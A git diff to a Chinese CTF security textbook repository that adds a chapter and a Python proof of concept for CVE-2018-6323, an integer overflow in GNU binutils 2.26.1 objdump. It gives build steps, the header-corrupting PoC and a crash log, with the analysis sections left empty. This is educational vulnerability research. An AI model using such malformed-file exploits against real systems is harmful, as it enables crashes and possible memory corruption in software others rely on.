diff --git a/FAQ.md b/FAQ.md
index 557a95e..603daab 100644
--- a/FAQ.md
+++ b/FAQ.md
@@ -18,7 +18,7 @@ CTF 是网络安全技术人员之间进行技术竞技的一种比赛形式，
 
 - 有 pdf/epub/mobi 版本吗？
 
-没有 epub/mobi 版本。暂时有 pdf，可在 GitBook 页面下载，未来考虑使用 Tex/LaTex 编写和编译，以提供更美观的 pdf。
+有，可在 GitBook 页面下载，未来考虑使用 Tex/LaTex 编写和编译，以提供更美观的 pdf。
 
 
 - 我能打印本书或者作为教材教课吗？
diff --git a/README.md b/README.md
index f19b80d..8d145ac 100644
--- a/README.md
+++ b/README.md
@@ -22,6 +22,10 @@ PDF 文件地址：
 ---
 请查看 [CONTRIBUTION.md](CONTRIBUTION.md)
 
+常见问题
+---
+请查看 [FAQ.md](FAQ.md)
+
 致谢
 ---
 请查看 [THANKS](THANKS)
diff --git a/SUMMARY.md b/SUMMARY.md
index 6b71441..d88973f 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -132,6 +132,7 @@ GitHub 地址：https://github.com/firmianay/CTF-All-In-One
   * [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](doc/7.1.4_wget_2017-13089.md)
   * [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
   * [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
+  * [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
 * [八、附录](doc/8_appendix.md)
   * [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
   * [8.2 更多 Windows 工具](doc/8.2_wintools.md)
diff --git a/doc/7.1.7_binutils_2018-6323.md b/doc/7.1.7_binutils_2018-6323.md
new file mode 100644
index 0000000..eacb681
--- /dev/null
+++ b/doc/7.1.7_binutils_2018-6323.md
@@ -0,0 +1,110 @@
+# 7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow
+
+- [漏洞描述](#漏洞描述)
+- [漏洞复现](#漏洞复现)
+- [漏洞分析](#漏洞分析)
+- [参考资料](#参考资料)
+
+
+[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430)
+
+## 漏洞描述
+
+## 漏洞复现
+| |推荐使用的环境 | 备注 |
+| --- | --- | --- |
+| 操作系统 | Ubuntu 16.04 | 体系结构：64 位 |
+| 调试器 | gdb-peda| 版本号：7.11.1 |
+| 漏洞软件 | binutils | 版本号：2.26.1 |
+
+编译安装 binutils：
+```
+$ wget https://ftp.gnu.org/gnu/binutils/binutils-2.26.1.tar.gz
+$ tar zxvf binutils-2.26.1.tar.gz
+$ cd binutils-2.26.1/
+$ ./configure --enable-64-bit-bfd
+$ make && sudo make install
+$ file /usr/local/bin/objdump 
+/usr/local/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=72a5ff5705687fd1aa6ee58aff08d57b87694cb4, not stripped
+```
+
+使用 PoC 如下：
+```python
+import os
+ 
+hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
+f = open("helloWorld.c", 'w')
+f.write(hello)
+f.close()
+ 
+os.system("gcc -c helloWorld.c -o test")
+
+f = open("test", 'rb+')
+f.read(0x2c)
+f.write("\xff\xff") # 65535
+f.read(0x244-0x2c-2)
+f.write("\x00\x00\x00\x20") # 536870912
+f.close()
+
+os.system("objdump -x test")
+```
+```
+$ python poc.py 
+objdump: test: File truncated
+*** Error in `objdump': free(): invalid pointer: 0x09803aa8 ***
+======= Backtrace: =========
+/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb75ef377]
+/lib/i386-linux-gnu/libc.so.6(+0x6d2f7)[0xb75f52f7]
+/lib/i386-linux-gnu/libc.so.6(+0x6dc31)[0xb75f5c31]
+objdump[0x81421cb]
+objdump[0x8091ab0]
+objdump[0x809349c]
+objdump[0x809400a]
+objdump[0x80522aa]
+objdump[0x804c17e]
+/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb75a0637]
+objdump[0x804c38a]
+======= Memory map: ========
+08048000-0822c000 r-xp 00000000 08:01 270806     /usr/local/bin/objdump
+0822c000-0822d000 r--p 001e3000 08:01 270806     /usr/local/bin/objdump
+0822d000-08231000 rw-p 001e4000 08:01 270806     /usr/local/bin/objdump
+08231000-08237000 rw-p 00000000 00:00 0 
+09802000-09823000 rw-p 00000000 00:00 0          [heap]
+b7200000-b7221000 rw-p 00000000 00:00 0 
+b7221000-b7300000 ---p 00000000 00:00 0 
+b7353000-b736f000 r-xp 00000000 08:01 394789     /lib/i386-linux-gnu/libgcc_s.so.1
+b736f000-b7370000 rw-p 0001b000 08:01 394789     /lib/i386-linux-gnu/libgcc_s.so.1
+b7387000-b7587000 r--p 00000000 08:01 141924     /usr/lib/locale/locale-archive
+b7587000-b7588000 rw-p 00000000 00:00 0 
+b7588000-b7738000 r-xp 00000000 08:01 394751     /lib/i386-linux-gnu/libc-2.23.so
+b7738000-b773a000 r--p 001af000 08:01 394751     /lib/i386-linux-gnu/libc-2.23.so
+b773a000-b773b000 rw-p 001b1000 08:01 394751     /lib/i386-linux-gnu/libc-2.23.so
+b773b000-b773e000 rw-p 00000000 00:00 0 
+b773e000-b7741000 r-xp 00000000 08:01 394775     /lib/i386-linux-gnu/libdl-2.23.so
+b7741000-b7742000 r--p 00002000 08:01 394775     /lib/i386-linux-gnu/libdl-2.23.so
+b7742000-b7743000 rw-p 00003000 08:01 394775     /lib/i386-linux-gnu/libdl-2.23.so
+b7751000-b7752000 rw-p 00000000 00:00 0 
+b7752000-b7759000 r--s 00000000 08:01 139343     /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
+b7759000-b775a000 r--p 00741000 08:01 141924     /usr/lib/locale/locale-archive
+b775a000-b775c000 rw-p 00000000 00:00 0 
+b775c000-b775e000 r--p 00000000 00:00 0          [vvar]
+b775e000-b7760000 r-xp 00000000 00:00 0          [vdso]
+b7760000-b7782000 r-xp 00000000 08:01 394723     /lib/i386-linux-gnu/ld-2.23.so
+b7782000-b7783000 rw-p 00000000 00:00 0 
+b7783000-b7784000 r--p 00022000 08:01 394723     /lib/i386-linux-gnu/ld-2.23.so
+b7784000-b7785000 rw-p 00023000 08:01 394723     /lib/i386-linux-gnu/ld-2.23.so
+bf85b000-bf87c000 rw-p 00000000 00:00 0          [stack]
+Aborted (core dumped)
+```
+
+需要注意的是如果在 configure 的时候没有使用参数 `--enable-64-bit-bfd`，将会出现下面的结果：
+```
+$ python poc.py 
+objdump: test: File format not recognized
+```
+
+
+## 漏洞分析
+
+## 参考资料
+- [GNU binutils 2.26.1 - Integer Overflow (POC)](https://www.exploit-db.com/exploits/44035/)
diff --git a/doc/7_exploit.md b/doc/7_exploit.md
index deac61e..460be6c 100644
--- a/doc/7_exploit.md
+++ b/doc/7_exploit.md
@@ -1,8 +1,9 @@
 # 第七篇 实战篇
 
-  - [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
-  - [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
-  - [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
-  - [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
-  - [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
-  - [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
+- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
+- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
+- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
+- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
+- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
+- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
+- [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
diff --git a/src/exploit/7.1.7_binutils_2018-6323/poc.py b/src/exploit/7.1.7_binutils_2018-6323/poc.py
new file mode 100644
index 0000000..8c9c257
--- /dev/null
+++ b/src/exploit/7.1.7_binutils_2018-6323/poc.py
@@ -0,0 +1,17 @@
+import os
+ 
+hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
+f = open("helloWorld.c", 'w')
+f.write(hello)
+f.close()
+ 
+os.system("gcc -c helloWorld.c -o test")
+
+f = open("test", 'rb+')
+f.read(0x2c)
+f.write("\xff\xff") # 65535
+f.read(0x244-0x2c-2)
+f.write("\x00\x00\x00\x20") # 536870912
+f.close()
+
+os.system("objdump -x test")
\ No newline at end of file